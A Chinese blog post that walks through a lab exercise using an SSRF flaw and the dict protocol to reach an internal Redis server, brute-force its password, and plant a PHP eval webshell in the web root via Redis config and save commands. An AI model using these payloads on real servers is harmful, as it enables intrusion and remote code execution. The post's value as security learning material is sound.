SSRF+Redis内网渗透一

于 2025-03-15 12:30:50 发布
阅读量620 收藏 17
点赞数 10
文章标签: 安全 redis SSRF 内网 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zj2084/article/details/146275393
版权

我们先将Redis启动起来

这时候使用windows去连接,连接成功的原因是Redis在配置文件中允许被远程访问,我们只需要在windows上操作Redis,爆破成功就可以成功登录上去了

还有一种情况就是,在之前进行远程登录的时候我们将bind 127.0.0.1 -::1给注释了,重新加了一个bind 0.0.0.0,我们现在将bing 127.0.0.1 -::1的注释给拿掉,将bind 0.0.0.0给注释了

然后在window上进行远程登录的时候就没有办法进行连接了,只能在本机进行连接

确认一下本机能否进行连接,经过验证,发现可以进行连接

这是之前学习SSRF时候写的代码,我用老师的电脑进行操作

首先先看看是否存在SSRF漏洞,经过我们的验证,的确存在,下图就是例子

 当我们一顿操作访问到6379端口的时候(可以使用Python进行脚本的撰写),发现一直在转圈,然后去换一个协议

换成dict的时候,发现一下子就出来啦,6378端口没有,只有6379端口有,回显的内容告诉我们需要进行登录,所以我们扫出来了6379端口,而这个消息就是Redis的消息,存在SSRF漏洞

然后我们尝试去登录它,发现半天都连不上,计算机拒绝连接,说明Redis bind了本机IP(环路IP),所以外部的客户端是无法进行连接Redis的,但是发现SSRF漏洞,发现这个漏洞就可以,如上图所示,提示告诉我们需要进行登录

dict协议是一个字典服务器协议,通常用于让客户端使用过程中能够访问更多的字典源,但是在SSRF中如果可以使用dict协议,那么就可以轻易的获取目标服务器端口上运行的服务版本等信息

这个时候我们得到了一些反馈,说明字典服务器是有效的,这只是个互联网上的一个服务器

后面跟上help的指令,会给我们返回当前字典有哪些指令和选项

查看其源代码

在指令位置使用show db,它会给我们返回这个字典服务器上的所拥有的各式各样的字典

 我们通过define指定一个数据库来查某一个单词的意思

 然后就会给我们返回family这个单词在这个字典里面的解释

Redis是键值对的形式,我们可以使用dict下达Redis的指令,在后面加上auth:admin123,提示告诉我们登录成功

 接下来执行指令keys *,发现还得进行验证,所以这儿有一个问题就是,dict协议支持Redis指令的操作,但是不支持维持这个session

 我们先把密码给注释掉,让这个实验能够更加顺利的走下去

接下来我们继续执行刚才那个指令,我们还可以执行其他的指令,这里就不再执行了

 我们进到Redis环境,同样的这些值都在这里面,所以就是我们可以通过dict这种协议来匿名登录然后还可以发送,将值成功保存到Redis服务器中

那么问题来了,如果这个Redis需要登录该怎么办呢

因为上面的环境我们将密码给注释掉了,所以不会被密码所限制,如果有密码的话,我们只能够登录上去,如果还想继续做Redis的操作,就已经不顶事了,因为这是一个死循环,无论如何只能执行auth:admin123,而不能进行接下来的操作,这样的话,dict这种协议就没有办法啦,dict还可以登录记录那条有效的,我们可以用来爆破登录的密码

于是呢,我们就使用gopher,gopher的能力比dict的强,因为gopher可 以构造各种TCP层面的请求包,所以gopher在SSRF漏洞利用中充当万金油的角色

由于上面我们将密码给注释了,所以我们现在将密码的注释给删除,然后我们使用bp进行爆破密码,爆破成功,发现密码是admin123

然后我们再将密码给注释掉,植入一个木马看看,还是和Redis实战的一样

config:set:dir:/opt/lampp/htdocs/security

config:set:dbfilename:redismm.php

set:myshell:<?php eval($_POST['code']); ?>

save

执行了save之后,我们就可以对这个木马文件进行访问

这个回显不对,看看是哪的问题,通过下图发现,很明显,内容有问题

这个时候我们先去做一个flushdb操作,将已有的数据给清空

 然后去Redis服务器去看看,发现当前数据库里面已经没有key了,因为我们已经将其清空了,不要让这些已有的东西来影响我们

接下来再配置路径,配置文件名,然后再设置内容,经过一系列的操作,发现这次输入的不会引起报错啦

set:myshell:<?=phpinfo();?>

然后save一下,做持久化操作,发现OK,没有报错了

然后我们进去Redis服务器里面验证一下,发现有key了,是myshell,然后我们get myshell,没有发现完整的PHP代码,只出现了<,说明在myshell写入的过程中?出现问题了

然后我们尝试在PHP代码两边加上换行符,发现也还是报错啦

set:myshell:"\n\n<?=phpinfo(); ?>\n\n"

我们也可以采取转义的方法

set:myshell:"\n\n<?php @eval($_POST[code]);?>\n\n"

我们对里面的PHP代码进行转义,转成16进制

然后我们save持久化一下,然后去文件系统里面看看写入的值正不正确,发现是正确的

然后就去访问这个redismm.php即可,这次保证成功,因为写入的PHP代码可以被执行解析

SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1406
gopher协议(信息查找协议),般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据般需要进行url编码。
ssrf+redis
qq_45213259的博客
11-30 3959
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
SSRF 漏洞利用 Redis 实战全解析:原理、攻击与防范
最新发布
xinyaoyaotu的博客
02-01 1719
利用 AntSword 等 Webshell 管理工具,配置连接地址为被攻击机的 IP 地址加上webshell.php路径,密码为webshell中已写入的密码,即可成功连接到目标服务器,实现对服务器的远程控制,执行系统命令、上传下载文件等操作。:在 Web 应用中,将频繁访问的数据存储在 Redis 中,大大减少数据库的负载,提高系统响应速度。:当 Redis 与存在 SSRF 漏洞的服务器结合时,攻击者可以利用 SSRF 漏洞,通过服务器间接控制 Redis,绕过网络限制,实现更复杂的攻击。
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3619
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2659
这篇博客就总结到这里,下次把经典点的SSRF题目都总结到起再学习波,冲冲冲!!!
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1683
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1284
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
SSRF+redis未授权漏洞复现
2302_80859314的博客
08-24 507
SSRF(Server-Side Request Forgery)即服务器端请求伪造,是种由攻击者构造攻击链传给服务器,服务器执行并发起请求造成安全问题的漏洞,般用来在外网探测或攻击内网服务。当网站需要调用指定URL地址的资源,但是没有对这个URL做好过滤,就会导致可以访问任意地址。
SSRFRedis进行内网渗透
zhuge_long的专栏
12-07 894
gopher协议(信息查找协议),般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据般需要进行url编码。
深入解析SSRFRedis未授权访问
m0_66993332的博客
08-24 1210
etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件SSRFRedis未授权访问是两类常见但极具威胁的安全漏洞。
SSRF漏洞之Redis利用篇
weixin_39664643的博客
01-21 3563
SSRF漏洞之Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
ssrf漏洞利用(内网探测、打redis)_ssrf内网探测,2024年最新面试 答案
2401_84181108的博客
04-17 844
libcurl版本>=7.45.0(curl版本小于7.45.0时,gopher的%00会被截断)``知道服务器上任意个php文件的绝对路径,例如/usr/local/lib/php/PEAR.php。还有两个定时服务文件是 /var/spool/cron/root 和 /var/spool/cron/crontabs/root。路径采用的是/etc/crontab.支持python反弹``路径使用:/etc/crontab或者/var/spool/cron/crontabs/root。
SSRF+redis写入webshell
qq_43665434的博客
04-03 1794
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redis和web服务(redis未授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrfredis未授权访问写入webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell写入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下写入
SSRFRedis的利用
2301_80127209的博客
01-23 1965
SSRF(Server-Side Request Forgery,服务器请求伪造)是种由攻击者构造请求,由服务端发起请求的安全漏洞,般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出些我们需要的利用语句。
基于SSRF+Redis内网渗透
weixin_46686336的博客
11-07 824
基于SSRF+Redis内网渗透
RedisSSRF中的应用
feng的博客
10-06 2936
偶然找到的篇文章,觉得写的很不错。本来只是收藏而不是转载,但是我发现这篇文章的原文已经挂了,因此就转载了过来。
Redis渗透测试的些Tips
qq_36334672的博客
02-11 1025
Redis默认端口为6379Redis支持五种数据类型:string(字符串),hash(哈希),list(列表),set(集合)及zset(sorted set:有序集合)。String类型最全能,可以包含任何数据Hash 相当于是个key可以储存多个 所以个hash可以有多个键值对List 允许用户从序列的两端快速推入或者弹出元素,应用场景:最新消息排行(热搜?set 无序不可重复,具有唯性sortedset 有顺序,不可重复,和set的区别是存在个参数(排序)与之关联。
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6431
前言 之前关于SSRFredis(redis的未授权漏洞)都没咋总结,现在总结下。 redis简介 redis个key-value存储系统,是个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
ssrf redis内网渗透
07-21
SSRF (Server-Side Request Forgery) 是种网络安全漏洞,发生在服务器处理请求时,由于设计不当或错误配置,使得服务器能够响应来自非预期来源的请求,这可能导致未经授权的内部网络访问,包括通过Redis服务。 Redis内网渗透是指攻击者利用SSRF漏洞,将外部网站或应用程序伪装成合法客户端向Redis服务器发送请求,从而获取、修改或控制服务器内的数据,进而访问到服务器所在的私有网络资源。这种情况下,攻击链可能会包括: 1. 发现并利用SSRF漏洞:首先,攻击者需要找到目标系统中存在的能引发SSRF的函数或API。 2. 构造恶意请求:构造特定的URL或HTTP请求,使其看起来像是正常的服务请求,但实际上指向的是Redis服务。 3. 内网穿透:通过Redis服务,攻击者可以读取敏感信息(如数据库记录、文件内容),甚至可能触发远程命令执行,进步扩大权限范围。 4. 数据泄露或操作:利用获取的权限,攻击者可以暴露内部系统的敏感数据,或者对关键系统进行破坏或操纵。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值